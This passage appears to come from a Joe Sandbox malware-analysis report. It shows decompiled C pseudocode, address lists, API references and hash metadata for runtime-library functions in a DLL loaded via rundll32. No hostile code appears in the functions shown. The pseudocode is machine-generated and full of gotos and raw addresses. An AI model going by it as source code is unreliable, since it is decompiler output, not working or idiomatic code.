								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E6E2550ED( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E6E24F26D(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E6E2550ED( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E6E242361(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6E24CBD3( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6e2c52ec & 0x00000001;
												if(( *0x6e2c52ec & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E6E24CBD3( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6E2425CE();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E6E24CBD3(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E6E242188();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E6E2209D6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E6E24E486(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}



































                          0x6e2423dd
                          0x6e2423dd
                          0x6e2423e2
                          0x6e2423e7
                          0x6e2423f7
                          0x6e2423f8
                          0x6e242401
                          0x6e242409
                          0x6e24240e
                          0x6e242411
                          0x6e242413
                          0x6e24241f
                          0x6e242429
                          0x6e24242c
                          0x6e24242d
                          0x6e24242f
                          0x6e242460
                          0x6e242461
                          0x6e242467
                          0x00000000
                          0x6e242431
                          0x6e24243b
                          0x6e242440
                          0x6e242443
                          0x6e242445
                          0x6e24245e
                          0x00000000
                          0x6e242447
                          0x6e242447
                          0x6e24244a
                          0x00000000
                          0x6e24244c
                          0x6e24244c
                          0x6e24244f
                          0x00000000
                          0x6e242451
                          0x00000000
                          0x6e242451
                          0x6e24244f
                          0x6e24244a
                          0x6e242445
                          0x6e242415
                          0x6e242415
                          0x6e242418
                          0x6e24246f
                          0x6e24246f
                          0x6e242470
                          0x6e242471
                          0x6e242472
                          0x6e242474
                          0x6e242479
                          0x6e242481
                          0x6e242489
                          0x6e24248d
                          0x6e242493
                          0x6e242494
                          0x6e242496
                          0x6e242498
                          0x6e2424a1
                          0x6e2424a6
                          0x6e2424ac
                          0x6e2424af
                          0x6e2424b2
                          0x6e2424b7
                          0x6e2424c6
                          0x6e2424cb
                          0x6e2424ce
                          0x6e2424d0
                          0x6e2424ea
                          0x6e2424f7
                          0x6e2424f9
                          0x6e2424fb
                          0x00000000
                          0x6e2424fd
                          0x6e2424fd
                          0x6e242500
                          0x6e242503
                          0x6e24250e
                          0x6e242511
                          0x6e242516
                          0x6e242519
                          0x6e24251b
                          0x6e24253e
                          0x6e24253e
                          0x6e242543
                          0x6e242548
                          0x6e242549
                          0x6e24254d
                          0x6e242553
                          0x6e242556
                          0x6e242558
                          0x6e24255c
                          0x6e242560
                          0x6e242566
                          0x6e24256b
                          0x6e24256c
                          0x6e242571
                          0x6e242571
                          0x6e242571
                          0x6e242560
                          0x6e242574
                          0x6e242577
                          0x6e24257e
                          0x6e242580
                          0x6e242587
                          0x6e24258d
                          0x6e24258f
                          0x6e242591
                          0x6e242595
                          0x6e242596
                          0x6e24259c
                          0x6e2425a2
                          0x6e2425a2
                          0x6e2425a2
                          0x6e2425a2
                          0x6e242596
                          0x6e24258f
                          0x6e242587
                          0x6e2425aa
                          0x6e2425ac
                          0x6e2425b3
                          0x6e2425b7
                          0x6e2425be
                          0x6e24251d
                          0x6e24251d
                          0x6e242520
                          0x6e242527
                          0x6e242527
                          0x6e242528
                          0x6e242529
                          0x6e24252a
                          0x6e24252b
                          0x00000000
                          0x6e242522
                          0x6e242522
                          0x6e242525
                          0x6e24252e
                          0x6e242530
                          0x00000000
                          0x6e242532
                          0x6e242533
                          0x00000000
                          0x6e242538
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e242525
                          0x6e242520
                          0x6e24251b
                          0x6e2424d2
                          0x6e2424d2
                          0x6e2424d5
                          0x6e2424dc
                          0x6e2424dc
                          0x6e2424dd
                          0x6e2424de
                          0x6e2424df
                          0x6e2424e0
                          0x6e2424e1
                          0x6e2424e1
                          0x6e2424d7
                          0x6e2424d7
                          0x6e2424da
                          0x00000000
                          0x00000000
                          0x6e2424da
                          0x6e2424e6
                          0x6e2424e8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e2424e8
                          0x6e24249a
                          0x6e24249a
                          0x6e24249a
                          0x6e2425ca
                          0x6e24241a
                          0x6e24241a
                          0x6e24241d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24241d
                          0x6e242418
                          0x6e2423e9
                          0x6e2423ee
                          0x6e24246b
                          0x6e24246e
                          0x6e24246e

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe
                          • String ID:
                          • API String ID: 4189289331-0
                          • Opcode ID: e4b542e468369e480a1d710993bb63c4644ecea5e299889bbd57a510be7afbc0
                          • Instruction ID: b04693f176100f01ff8d8e5a36528e08456677cf2f239af8ae628ca8f22cae23
                          • Opcode Fuzzy Hash: e4b542e468369e480a1d710993bb63c4644ecea5e299889bbd57a510be7afbc0
                          • Instruction Fuzzy Hash: 8F51D8B790420EEBEB5C8BEACC51E9E77BFEB49725F104519E825E7181EF34D5008660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2242C8, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E6E2242C8(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6e2c5090 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6E2256A9(__eflags,  *0x6e2c5090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E2256E4(__eflags,  *0x6e2c5090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E6E22B9EA(_t16);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E2256E4(__eflags,  *0x6e2c5090, 0);
								} else {
									__eflags = E6E2256E4(__eflags,  *0x6e2c5090, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6E241DEB(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








                          0x6e2242cf
                          0x6e2242e2
                          0x6e2242e9
                          0x6e2242ec
                          0x6e2242ef
                          0x6e224308
                          0x6e224308
                          0x6e2242f1
                          0x6e2242f1
                          0x6e2242f3
                          0x6e2242fd
                          0x6e224303
                          0x6e224304
                          0x6e224306
                          0x6e22430d
                          0x6e22430f
                          0x6e224316
                          0x6e22431a
                          0x6e22431c
                          0x6e224330
                          0x6e224330
                          0x6e224339
                          0x6e22431e
                          0x6e22432c
                          0x6e22432e
                          0x6e224342
                          0x6e224344
                          0x6e224344
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e22432e
                          0x6e224347
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e224306
                          0x6e2242f3
                          0x6e22434f
                          0x6e224359
                          0x6e2242d1
                          0x6e2242d3
                          0x6e2242d3

                          APIs
                          • GetLastError.KERNEL32(00000001,?,6E223EDB,6E21FA25,6E21FD54,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E), ref: 6E2242D6
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2242E4
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2242FD
                          • SetLastError.KERNEL32(00000000,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E22434F
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
                          • Instruction ID: f1dbadee7f91d3c947d3c483ba98e15bbc5920e0da9bb9bb820dfe588d201991
                          • Opcode Fuzzy Hash: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
                          • Instruction Fuzzy Hash: 4201703615DB2B5FD78405F5AC9DA97376BEB17B7A330833AF014850D8EF528802C190
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FA97, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20FA97(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t198 - 0x14, 0);
				_t189 =  *0x6e2c6dfc; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1E161C(0x6e2c6da8);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E2066BA(_t198 - 0x14);
					return E6E220075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E2114EC(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t198 - 0x20);
							E6E223D74(_t198 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t184, _t189, 0x14);
							E6E206653(_t198 - 0x14, 0);
							_t190 =  *0x6e2c6dcc; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1E161C(0x6e2c6d80);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E2066BA(_t198 - 0x14);
								return E6E220075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E211558(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t198 - 0x20);
										E6E223D74(_t198 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t141, _t185, _t190, 0x14);
										E6E206653(_t198 - 0x14, 0);
										_t191 =  *0x6e2c6e00; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1E161C(0x6e2c6dac);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E2066BA(_t198 - 0x14);
											return E6E220075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E2115C4(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t198 - 0x20);
													E6E223D74(_t198 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t141, _t186, _t191, 0x14);
													E6E206653(_t198 - 0x14, 0);
													_t192 =  *0x6e2c6dd0; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1E161C(0x6e2c6d60);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E2066BA(_t198 - 0x14);
														return E6E220075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E21162A(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1E1438(_t169);
																E6E223D74(_t198 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e26851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e26c0c4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E21542F(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E220075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E206FD3(__eflags, _t187);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e2c6dd0 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E206FD3(__eflags, _t186);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e2c6e00 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E206FD3(__eflags, _t185);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e2c6dcc = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E206FD3(__eflags, _t184);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e2c6dfc = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}


















                          0x6e20fa97
                          0x6e20fa97
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20fac8
                          0x6e20facd
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FA9E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FAA8
                          • int.LIBCPMT ref: 6E20FABF
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FAF9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FB19
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FB37
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
                          • Instruction ID: f404a529c8d1b5821af0a7ab00ac64639aab1fa7b517d80822bcfb7494d569a5
                          • Opcode Fuzzy Hash: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
                          • Instruction Fuzzy Hash: DA11067AA0051E8FCF00DBE0C894AEEB77BBF44B14F244919E4116B2D0DF749A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FB3D, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E20FB3D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t154 - 0x14, 0);
				_t147 =  *0x6e2c6dcc; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1E161C(0x6e2c6d80);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E2066BA(_t154 - 0x14);
					return E6E220075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E211558(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t154 - 0x20);
							E6E223D74(_t154 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t143, _t147, 0x14);
							E6E206653(_t154 - 0x14, 0);
							_t148 =  *0x6e2c6e00; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1E161C(0x6e2c6dac);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E2066BA(_t154 - 0x14);
								return E6E220075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E2115C4(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t154 - 0x20);
										E6E223D74(_t154 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t110, _t144, _t148, 0x14);
										E6E206653(_t154 - 0x14, 0);
										_t149 =  *0x6e2c6dd0; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1E161C(0x6e2c6d60);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E2066BA(_t154 - 0x14);
											return E6E220075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E21162A(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1E1438(_t131);
													E6E223D74(_t154 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e26851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e26c0c4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E21542F(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E220075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E206FD3(__eflags, _t145);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e2c6dd0 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E206FD3(__eflags, _t144);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e2c6e00 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E206FD3(__eflags, _t143);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e2c6dcc = _t143;
							goto L5;
						}
					} else {
